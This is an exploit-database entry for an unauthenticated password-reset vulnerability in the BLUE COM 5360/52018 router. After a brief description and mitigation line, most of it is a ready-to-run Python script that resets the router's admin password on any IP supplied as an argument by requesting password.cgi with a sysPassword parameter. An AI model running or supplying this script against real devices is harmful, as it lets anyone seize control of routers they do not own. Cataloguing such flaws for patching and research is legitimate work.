BLUE COM Router - 5360/52018 Password Reset Exploit

vendor:

Router - 5360/52018

by:

KAI (kaisai12)

7,5

CVSS

HIGH

Password Reset

259

CWE

Product Name: Router - 5360/52018

Affected Version From: BCOM - 5360

Affected Version To: BCOM - 5360

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

BLUE COM Router – 5360/52018 Password Reset Exploit

The vulnerability exists in the BLUE COM Router - 5360/52018, which allows an attacker to reset the password of the router without any authentication. The exploit is achieved by sending a POST request to the password.cgi page with the new password in the sysPassword parameter.

Mitigation:

Ensure that the router is updated to the latest version and that the password is changed regularly.

Source

Exploit-DB raw data:

# Exploit Title: BLUE COM Router - 5360/52018 Password Reset Exploit
# Date: 20/1/2013
# Exploit Author: KAI (kaisai12)
# Home: CEH.VN
# Version: BCOM - 5360

# vulnerability - change password easy ! no protect !
#var loc = 'password.cgi?';
#switch ( idx ) {
#         case 2:
#            loc += 'sptPassword=' + encodeUrl(pwdNew.value);
#            break;
#         case 3:
#            loc += 'usrPassword=' + encodeUrl(pwdNew.value);
#            break;
#         default:
#            loc += 'sysPassword=' + encodeUrl(pwdNew.value);
#            break;
#      }
#
#      var code = 'location="' + loc + '"';
#      eval(code);
#   }
#}


import urllib
import sys

def attackrouter(ip,password):
    try:
        params = urllib.urlencode({'sysPassword': str(password)})
        f = urllib.urlopen("http://"+ip+"/password.cgi?%s" % params)
        print "[+] IP: %s - Reset password: %s" % (ip,password)
        return
    except:
        print "[-] error"
       

def main():
    if len(sys.argv) > 2:
       ip = sys.argv[1]
       password = sys.argv[2]
       print "--------------------------------------------------"
       print "Router BCOM Exploit Execute Reset password modem  "
       print "                             author: KAI(CEH>VN)  "
       print "--------------------------------------------------"
       print "[+] Sending exploit: OK"
       attackrouter(ip,password)
    else:
        print "[-] Command error"
        print "[-] Use:bluecomRT.py <ip> <password>"

if __name__ == '__main__':
     main()